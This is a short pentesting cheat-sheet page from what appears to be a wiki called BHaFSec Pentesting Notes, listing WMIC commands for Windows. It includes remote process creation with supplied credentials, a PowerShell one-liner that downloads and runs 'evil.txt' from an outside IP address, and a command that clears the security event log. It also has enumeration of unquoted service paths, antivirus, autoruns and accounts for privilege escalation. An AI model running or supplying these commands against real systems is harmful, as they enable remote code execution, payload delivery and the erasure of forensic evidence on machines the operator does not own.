WMIC

From BHaFSec Pentesting Notes Wiki
Jump to: navigation, search

Add Admin User Remotely

wmic /node:[IP address] /user:”[user name]” /password:”[password]” process call create “cmd /c c:\Windows\System32\net.exe user”

Find all AD accounts whose password is set to never expire:

wmic UserAccount where PasswordExpires=False get Name

From a Windows command prompted spawned with "shell" in Meterpreter, use WMIC to remotely execute a Powershell command to download and run a Powershell script:

wmic /User:"Domain\User" /Password:"thepasswordlol" /Node:"1.2.3.4" process call create "powershell.exe -exec bypass -nop -c \"IEX (New-Object Net.WebClient).DownloadString('http://9.8.7.6/evil.txt');\""

List services running as SYSTEM & possibly weak file perms:

wmic service where StartName="LocalSystem"|findstr /IV ":\WIN :\PROG"

List unquoted service paths

wmic service get name,displayname,pathname,startmode |findstr /i "auto" |findstr /i /v "c:\windows\\" |findstr /i /v """
wmic service get name,startmode,pathname | findstr /i /v ":\windows\\" | findstr /v """

List Which Antivirus is installed

wmic.exe /Namespace:\\root\SecurityCenter2 Path AntiVirusProduct Get *
wmic /Namespace:\\root\SecurityCenter2 Path AntiVirusProduct Get displayName,pathtoSignedProductExe

List autoruns

wmic startup list full
wmic startup list brief | find /i "hklm"

Get MAC Address

wmic nic get macaddress

Clear Event Log

wmic nteventlog where (description like "%secevent%") call cleareventlog

total number of logons for user

wmic netlogin where (name like "%skodo") get numberoflogons

Service Changing

wmic service where (name like "Fax" OR name like "Alerter") CALL ChangeStartMode Disabled

Check Machines for patches

wmic /node:box.domain.com qfe where "not description like " get description,hotfixid,installedon 

Check for disabled accounts

wmic USERACCOUNT WHERE "Disabled=0 AND LocalAccount=1" GET Name"

kill process

wmic process where name='cmd.exe' delete
wmic process [pid] delete

Account info

wmic useraccount